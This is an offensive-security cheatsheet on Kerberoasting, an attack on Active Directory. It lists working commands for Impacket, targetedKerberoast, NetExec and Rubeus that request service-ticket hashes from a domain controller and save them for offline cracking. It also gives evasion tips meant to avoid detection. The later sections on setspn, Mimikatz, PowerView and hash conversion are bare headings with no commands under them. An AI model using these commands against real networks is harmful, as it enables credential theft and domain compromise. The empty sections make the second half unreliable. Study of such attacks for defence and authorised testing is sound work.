Kerberoasting
Cheatsheet with commands for performing Kerberoasting from the outside and inside.
Requesting hashes with Impacket:
impacket-GetUserSPNs -dc-ip <DC_IP> <domain>/<user>:<pass> -request -outputfile hashes.txt
Supports AES keys (-aesKey), Kerberos auth (-k), and targeted users (-usersfile).
ACL abuse Kerberoasting with targetedKerberoast:
./targetedKerberoast.py -d <domain> -u <user> -p <pass> --dc-ip <DC_IP>
Requesting hashes with NetExec:
nxc ldap <DC_IP> -u <user> -p <pass> --kerberoasting hashes.txt
Fast enumeration and roasting with built-in OPSEC options like AES256 preference.
Requesting hashes with Rubeus:
Rubeus.exe kerberoast /user:<target> /outfile:hashes.txt
or full enum:
Rubeus.exe kerberoast /outfile:hashes.txt
Use /aes256 for OpSec, /interval:60s to space requests, and /nowrap to mimic LSASS flags.
Enumerating SPNs with setspn.exe :
Retrieving All Tickets Using setspn.exe (May require Powershell started as Administrator):
Extracting Tickets from Memory with Mimikatz:
Getting users with SPNs in target with Powerview:
Using PowerView to Target a Specific User:
Exporting All Tickets to a CSV File with PowerView:
Convert kirbi file to John format:
or:
Convert to Hashcat format:
Converting Kerberos Hash to oneline format in Linux:
Converting Kerberos Hash to oneline format in PowerShell:
